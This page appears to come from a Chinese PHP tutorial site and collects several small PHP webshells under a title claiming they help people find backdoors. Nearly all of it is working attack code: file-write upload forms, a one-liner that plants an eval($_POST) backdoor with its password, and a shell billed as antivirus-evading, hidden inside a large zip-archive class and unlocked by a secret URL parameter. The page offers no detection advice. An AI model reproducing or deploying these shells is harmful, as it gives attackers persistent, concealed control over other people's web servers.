首页
所有分类
TAGS
文字工具 EMOJI BIBLE
编程 PHP

超小PHP小马小结(方便查找后门的朋友)

Posted in PHP onMay 05, 2012

作者: spider
我也来个超小PHP小马 

<?php 
header("content-Type: text/html; charset=gb2312"); 
if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v); 
?> 
<form method="POST"> 
保存文件名: <input type="text" name="file" size="60" value="<? echo str_replace('\\','/',__FILE__) ?>"> 
<br><br> 
<textarea name="text" COLS="70" ROWS="18" ></textarea> 
<br><br> 
<input type="submit" name="submit" value="保存"> 
<form> 
<?php 
if(isset($_POST['file'])) 
{ 
$fp = @fopen($_POST['file'],'wb'); 
echo @fwrite($fp,$_POST['text']) ? '保存成功!' : '保存失败!'; 
@fclose($fp); 
} 
?>

昨晚无聊看了会 php 的教程,发现php真是相当的强大啊!顺便写了个php小马
下面直接贴代码了。。 
<html> 
<title >By: SinCoder</title> 
<font color=red size=6>php小马 By:SinCoder</br></font> 
<? echo "</br>本程序的路径: ".__FILE__. 
"</br>服务器操作系统: ".PHP_OS. 
"</br>服务器IP地址: ".gethostbyname($_SERVER["SERVER_NAME"]). 
"</br>PHP版本: ".PHP_VERSION; 
?> 
<form action = <? echo strrchr(__FILE__,"\\"); ?> method="post"> 
要提交的数据:</br> 
<textarea type="text" name="data" rows="10" cols="30"> 
</textarea> 
</br> 
保存路径:<input type="text" name="dir" /> 
</br> 
<input type="submit" value="提交"/> 
</form> 
</html> 
<? 
if(!(isset($_POST["data"]) && isset($_POST["dir"]))) 
exit(); 
if(strlen($_POST["data"])>0 && strlen($_POST["dir"])>0) 
{ 
$p_File=fopen($_POST["dir"],"a"); 
if(!$p_File) 
echo "写入失败!请换个目录试试!"; 
else 
echo "Ok!! "; 
fputs($p_File,$_POST["data"]); 
fclose($p_File); 
} 
else 
echo "请把数据填写完整!"; 
?>

php一句话小马的后门 
<?fputs(fopen(jb51.php,w),<?eval($_POST[jb51]);?>)?>

这样访问之后,在当前目录生成jb51.php 内容为 <?eval($_POST[jb51]);?>)?> 的一句话小马,密码为 jb51
最新免杀php小马 
<?php 
class zip 
{ 
var $datasec, $ctrl_dir = array(); 
var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; 
var $old_offset = 0; var $dirs = Array("."); 
function get_List($zip_name) 
{ 
$ret = ''; 
$zip = @fopen($zip_name, 'rb'); 
if(!$zip) return(0); 
$centd = $this->ReadCentralDir($zip,$zip_name); 
@rewind($zip); 
@fseek($zip, $centd['offset']); 
for ($i=0; $i<$centd['entries']; $i++) 
{ 
$header = $this->ReadCentralFileHeaders($zip); 
$header['index'] = $i;$info['filename'] = $header['filename']; 
$info['stored_filename'] = $header['stored_filename']; 
$info['size'] = $header['size'];$info['compressed_size']=$header['compressed_size']; 
$info['crc'] = strtoupper(dechex( $header['crc'] )); 
$info['mtime'] = $header['mtime']; $info['comment'] = $header['comment']; 
$info['folder'] = ($header['external']==0x41FF0010||$header['external']==16)?1:0; 
$info['index'] = $header['index'];$info['status'] = $header['status']; 
$ret[]=$info; unset($header); 
} 
return $ret; 
} 
function Add($files,$compact) 
{ 
if(!is_array($files[0])) $files=Array($files); 
for($i=0;$files[$i];$i++){ 
$fn = $files[$i]; 
if(!in_Array(dirname($fn[0]),$this->dirs)) 
$this->add_Dir(dirname($fn[0])); 
if(basename($fn[0])) 
$ret[basename($fn[0])]=$this->add_File($fn[1],$fn[0],$compact); 
} 
return $ret; 
} 
function get_file() 
{ 
$data = implode('', $this -> datasec); 
$ctrldir = implode('', $this -> ctrl_dir); 
return $data . $ctrldir . $this -> eof_ctrl_dir . 
pack('v', sizeof($this -> ctrl_dir)).pack('v', sizeof($this -> ctrl_dir)). 
pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00"; 
} 
function add_dir($name) 
{ 
$name = str_replace("\\", "/", $name); 
$fr = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00"; 
$fr .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) ); 
$fr .= pack("v", 0 ).$name.pack("V", 0).pack("V", 0).pack("V", 0); 
$this -> datasec[] = $fr; 
$new_offset = strlen(implode("", $this->datasec)); 
$cdrec = "\x50\x4b\x01\x02\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00"; 
$cdrec .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) ); 
$cdrec .= pack("v", 0 ).pack("v", 0 ).pack("v", 0 ).pack("v", 0 ); 
$ext = "\xff\xff\xff\xff"; 
$cdrec .= pack("V", 16 ).pack("V", $this -> old_offset ).$name; 
$this -> ctrl_dir[] = $cdrec; 
$this -> old_offset = $new_offset; 
$this -> dirs[] = $name; 
} 
function add_File($data, $name, $compact = 1) 
{ 
$name = str_replace('\\', '/', $name); 
$dtime = dechex($this->DosTime()); 
$hexdtime = '\x' . $dtime[6] . $dtime[7].'\x'.$dtime[4] . $dtime[5] 
. '\x' . $dtime[2] . $dtime[3].'\x'.$dtime[0].$dtime[1]; 
eval('$hexdtime = "' . $hexdtime . '";'); 
if($compact) 
$fr = "\x50\x4b\x03\x04\x14\x00\x00\x00\x08\x00".$hexdtime; 
else $fr = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00".$hexdtime; 
$unc_len = strlen($data); $crc = crc32($data); 
if($compact){ 
$zdata = gzcompress($data); $c_len = strlen($zdata); 
$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); 
}else{ 
$zdata = $data; 
} 
$c_len=strlen($zdata); 
$fr .= pack('V', $crc).pack('V', $c_len).pack('V', $unc_len); 
$fr .= pack('v', strlen($name)).pack('v', 0).$name.$zdata; 
$fr .= pack('V', $crc).pack('V', $c_len).pack('V', $unc_len); 
$this -> datasec[] = $fr; 
$new_offset = strlen(implode('', $this->datasec)); 
if($compact) 
$cdrec = "\x50\x4b\x01\x02\x00\x00\x14\x00\x00\x00\x08\x00"; 
else $cdrec = "\x50\x4b\x01\x02\x14\x00\x0a\x00\x00\x00\x00\x00"; 
$cdrec .= $hexdtime.pack('V', $crc).pack('V', $c_len).pack('V', $unc_len); 
$cdrec .= pack('v', strlen($name) ).pack('v', 0 ).pack('v', 0 ); 
$cdrec .= pack('v', 0 ).pack('v', 0 ).pack('V', 32 ); 
$cdrec .= pack('V', $this -> old_offset ); 
$this -> old_offset = $new_offset; 
$cdrec .= $name; 
$this -> ctrl_dir[] = $cdrec; 
return true; 
} 
function DosTime() { 
$timearray = getdate(); 
if ($timearray['year'] < 1980) { 
$timearray['year'] = 1980; $timearray['mon'] = 1; 
$timearray['mday'] = 1; $timearray['hours'] = 0; 
$timearray['minutes'] = 0; $timearray['seconds'] = 0; 
} 
return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | 
($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); 
} 
//解压整个压缩包 
//直接用 Extract 会有路径问题,本函数先从列表中获得文件信息并创建好所有目录然后才运行 Extract 
function ExtractAll ( $zn, $to) 
{ 
if(substr($to,-1)!="/") $to .= "/"; 
$files = $this->get_List($zn); 
$cn = count($files); 
if(is_array($files)) 
{ 
for($i=0;$i<$cn;$i++) 
{ 
if($files[$i]['folder']==1){ 
@mkdir($to.$files[$i]['filename'],$GLOBALS['cfg_dir_purview']); 
@chmod($to.$files[$i]['filename'],$GLOBALS['cfg_dir_purview']); 
} 
} 
} 
$this->Extract ($zn,$to); 
} 
function Extract ( $zn, $to, $index = Array(-1) ) 
{ 
$ok = 0; $zip = @fopen($zn,'rb'); 
if(!$zip) return(-1); 
$cdir = $this->ReadCentralDir($zip,$zn); 
$pos_entry = $cdir['offset']; 
if(!is_array($index)){ $index = array($index); } 
for($i=0; isset($index[$i]);$i++){ 
if(intval($index[$i])!=$index[$i]||$index[$i]>$cdir['entries']) 
return(-1); 
} 
for ($i=0; $i<$cdir['entries']; $i++) 
{ 
@fseek($zip, $pos_entry); 
$header = $this->ReadCentralFileHeaders($zip); 
$header['index'] = $i; $pos_entry = ftell($zip); 
@rewind($zip); fseek($zip, $header['offset']); 
if(in_array("-1",$index)||in_array($i,$index)) 
$stat[$header['filename']]=$this->ExtractFile($header, $to, $zip); 
} 
fclose($zip); 
return $stat; 
} 
function ReadFileHeader($zip) 
{ 
$binary_data = fread($zip, 30); 
$data = unpack('vchk/vid/vversion/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len', $binary_data); 
$header['filename'] = fread($zip, $data['filename_len']); 
if ($data['extra_len'] != 0) { 
$header['extra'] = fread($zip, $data['extra_len']); 
} else { $header['extra'] = ''; } 
$header['compression'] = $data['compression'];$header['size'] = $data['size']; 
$header['compressed_size'] = $data['compressed_size']; 
$header['crc'] = $data['crc']; $header['flag'] = $data['flag']; 
$header['mdate'] = $data['mdate'];$header['mtime'] = $data['mtime']; 
if ($header['mdate'] && $header['mtime']){ 
$hour=($header['mtime']&0xF800)>>11;$minute=($header['mtime']&0x07E0)>>5; 
$seconde=($header['mtime']&0x001F)*2;$year=(($header['mdate']&0xFE00)>>9)+1980; 
$month=($header['mdate']&0x01E0)>>5;$day=$header['mdate']&0x001F; 
$header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year); 
}else{$header['mtime'] = time();} 
$header['stored_filename'] = $header['filename']; 
$header['status'] = "ok"; 
return $header; 
} 
function ReadCentralFileHeaders($zip){ 
$binary_data = fread($zip, 46); 
$header = unpack('vchkid/vid/vversion/vversion_extracted/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len/vcomment_len/vdisk/vinternal/Vexternal/Voffset', $binary_data); 
if ($header['filename_len'] != 0) 
$header['filename'] = fread($zip,$header['filename_len']); 
else $header['filename'] = ''; 
if ($header['extra_len'] != 0) 
$header['extra'] = fread($zip, $header['extra_len']); 
else $header['extra'] = ''; 
if ($header['comment_len'] != 0) 
$header['comment'] = fread($zip, $header['comment_len']); 
else $header['comment'] = ''; 
if ($header['mdate'] && $header['mtime']) 
{ 
$hour = ($header['mtime'] & 0xF800) >> 11; 
$minute = ($header['mtime'] & 0x07E0) >> 5; 
$seconde = ($header['mtime'] & 0x001F)*2; 
$year = (($header['mdate'] & 0xFE00) >> 9) + 1980; 
$month = ($header['mdate'] & 0x01E0) >> 5; 
$day = $header['mdate'] & 0x001F; 
$header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year); 
} else { 
$header['mtime'] = time(); 
} 
$header['stored_filename'] = $header['filename']; 
$header['status'] = 'ok'; 
if (substr($header['filename'], -1) == '/') 
$header['external'] = 0x41FF0010; 
return $header; 
} 
function ReadCentralDir($zip,$zip_name) 
{ 
$size = filesize($zip_name); 
if ($size < 277) $maximum_size = $size; 
else $maximum_size=277; 
@fseek($zip, $size-$maximum_size); 
$pos = ftell($zip); $bytes = 0x00000000; 
while ($pos < $size) 
{ 
$byte = @fread($zip, 1); $bytes=($bytes << 8) | Ord($byte); 
if ($bytes == 0x504b0506){ $pos++; break; } $pos++; 
} 
$data = @unpack('vdisk/vdisk_start/vdisk_entries/ventries/Vsize/Voffset/vcomment_size',fread($zip, 18)); 
if ($data['comment_size'] != 0) $centd['comment'] = fread($zip, $data['comment_size']); 
else $centd['comment'] = ''; $centd['entries'] = $data['entries']; 
$centd['disk_entries'] = $data['disk_entries']; 
$centd['offset'] = $data['offset'];$centd['disk_start'] = $data['disk_start']; 
$centd['size'] = $data['size']; $centd['disk'] = $data['disk']; 
return $centd; 
} 
function ExtractFile($header,$to,$zip) 
{ 
$header = $this->readfileheader($zip); 
$header['external'] = (!isset($header['external']) ? 0 : $header['external']); 
if(substr($to,-1)!="/") $to.="/"; 
if(!@is_dir($to)) @mkdir($to,$GLOBALS['cfg_dir_purview']); 
if (!($header['external']==0x41FF0010)&&!($header['external']==16)) 
{ 
if ($header['compression']==0) 
{ 
$fp = @fopen($to.$header['filename'], 'wb'); 
if(!$fp) return(-1); 
$size = $header['compressed_size']; 
while ($size != 0) 
{ 
$read_size = ($size < 2048 ? $size : 2048); 
$buffer = fread($zip, $read_size); 
$binary_data = pack('a'.$read_size, $buffer); 
@fwrite($fp, $binary_data, $read_size); 
$size -= $read_size; 
} 
fclose($fp); 
touch($to.$header['filename'], $header['mtime']); 
}else{ 
$fp = @fopen($to.$header['filename'].'.gz','wb'); 
if(!$fp) return(-1); 
$binary_data = pack('va1a1Va1a1', 0x8b1f, Chr($header['compression']), 
Chr(0x00), time(), Chr(0x00), Chr(3)); 
fwrite($fp, $binary_data, 10); 
$size = $header['compressed_size']; 
while ($size != 0) 
{ 
$read_size = ($size < 1024 ? $size : 1024); 
$buffer = fread($zip, $read_size); 
$binary_data = pack('a'.$read_size, $buffer); 
@fwrite($fp, $binary_data, $read_size); 
$size -= $read_size; 
} 
$binary_data = pack('VV', $header['crc'], $header['size']); 
fwrite($fp, $binary_data,8); fclose($fp); 
$gzp = @gzopen($to.$header['filename'].'.gz','rb') or die("Cette archive est compress"); 
if(!$gzp) return(-2); 
$fp = @fopen($to.$header['filename'],'wb'); 
if(!$fp) return(-1); 
$size = $header['size']; 
while ($size != 0) 
{ 
$read_size = ($size < 2048 ? $size : 2048); 
$buffer = gzread($gzp, $read_size); 
$binary_data = pack('a'.$read_size, $buffer); 
@fwrite($fp, $binary_data, $read_size); 
$size -= $read_size; 
} 
fclose($fp); gzclose($gzp); 
touch($to.$header['filename'], $header['mtime']); 
@unlink($to.$header['filename'].'.gz'); 
}} 
return true; 
} 
} 
if($_GET['zxzgcn']=='login'){ 
header("content-Type: text/html; charset=gb2312"); 
if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v); 
?> 
<form method="POST"> 
save to: <input type="text" name="file" size="60" value="<? echo str_replace('\\','/',__FILE__) ?>"> 
<br><br> 
<textarea name="text" COLS="70" ROWS="18" ></textarea> 
<br><br> 
<input type="submit" name="submit" value="save"> 
<form> 
<?php 
if(isset($_POST['file'])) 
{ 
$fp = @fopen($_POST['file'],'wb'); 
echo @fwrite($fp,$_POST['text']) ? 'succed!' : 'faled!'; 
@fclose($fp); 
} 
} 
?>

用法xxx.php?zxzgcn=login

超小PHP小马小结(方便查找后门的朋友)

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

PHP 相关文章推荐
落伍首发 php+mysql 采用ajax技术的 省 市 地 3级联动无刷新菜单 源码
Dec 16 PHP
php获取post中的json数据的实现方法
Jun 08 PHP
MySQL时间字段究竟使用INT还是DateTime的说明
Feb 27 PHP
php读取excel文件的简单实例
Aug 26 PHP
PHP strstr 函数判断字符串是否否存在的实例代码
Sep 28 PHP
destoon后台网站设置变成空白的解决方法
Jun 21 PHP
php中socket通信机制实例详解
Jan 03 PHP
PHP经典面试题之设计模式(经常遇到)
Oct 15 PHP
Codeigniter中集成smarty和adodb的方法
Mar 04 PHP
如何使用PHP给图片加水印
Oct 12 PHP
Windows下wamp php单元测试工具PHPUnit安装及生成日志文件配置方法
May 28 PHP
Yii2框架视图(View)操作及Layout的使用方法分析
May 27 PHP
apache mysql php 源码编译使用方法
May 03 #PHP
几个有用的php字符串过滤,转换函数代码
May 01 #PHP
PHP 基于文件头的文件类型验证类函数
May 01 #PHP
PHP 第三节 变量介绍
Apr 28 #PHP
PHP 第二节 数据类型之转换
Apr 28 #PHP
PHP 第二节 数据类型之数组
Apr 28 #PHP
PHP 第二节 数据类型之字符串类型
Apr 28 #PHP
广播稿(323) 计划书(118) 答谢词(97) 接收函(23) 辞职信(98) 方案(1080) 证明书(326) 教学反思(909) 事迹材料(636) 感言(394)
You might like
php提交表单时判断 if($_POST[submit])与 if(isset($_POST[submit])) 的区别
2011/02/08 PHP
调用WordPress函数统计文章访问量及PHP原生计数器的实现
2016/03/21 PHP
thinkphp隐藏index.php/home并允许访问其他模块的实现方法
2016/10/13 PHP
ThinkPHP5.1框架数据库链接和增删改查操作示例
2019/08/03 PHP
在chrome中window.onload事件的一些问题
2010/03/01 Javascript
有道JavaScript监听浏览器的问题
2010/06/23 Javascript
数组方法解决JS字符串连接性能问题有争议
2011/01/12 Javascript
通过AJAX的JS、JQuery两种方式解析XML示例介绍
2013/09/23 Javascript
JS连连看源码完美注释版(推荐)
2013/12/09 Javascript
jQuery:delegate中select()不起作用的解决方法(实例讲解)
2014/01/26 Javascript
node.js中的fs.lstat方法使用说明
2014/12/16 Javascript
JS+CSS实现DIV层的展开、收缩效果
2016/01/28 Javascript
jQuery DateTimePicker 日期和时间插件示例
2017/01/22 Javascript
JavaScript和jQuery制作光棒效果
2017/02/24 Javascript
weex slider实现滑动底部导航功能
2017/08/28 Javascript
JavaScript设计模式之装饰者模式定义与应用示例
2018/07/25 Javascript
Node.js中的不安全跳转如何防御详解
2018/10/21 Javascript
JS 正则表达式验证密码、邮箱格式的实例代码
2018/10/28 Javascript
微信小程序实现列表页的点赞和取消点赞功能
2018/11/02 Javascript
js键盘事件实现人物的行走
2020/01/17 Javascript
Python操作mongodb数据库进行模糊查询操作示例
2018/06/09 Python
python将txt文件读入为np.array的方法
2018/10/30 Python
H5混合开发app如何升级的方法
2018/01/10 HTML / CSS
html5 横向滑动导航栏的方法示例
2020/05/08 HTML / CSS
英国著名国际平价时尚男装品牌:Topman
2016/08/27 全球购物
法国包包和行李箱销售网站:Bagage24.fr
2020/03/24 全球购物
Agoda中文官网:安可达(低价预订全球酒店)
2021/01/18 全球购物
Java里面Pass by value和Pass by Reference是什么意思
2016/05/02 面试题
家长通知书教师评语
2014/04/17 职场文书
农村党支部书记司法四风问题对照检查材料
2014/09/26 职场文书
法定代表人身份证明书(含说明)
2014/10/02 职场文书
维稳工作承诺书
2015/01/20 职场文书
小组口号霸气押韵
2015/12/24 职场文书
2019年聘任书的写作格式及范文!
2019/07/03 职场文书
浅谈Redis的几个过期策略
2021/05/27 Redis
Python如何识别银行卡卡号?
2021/06/10 Python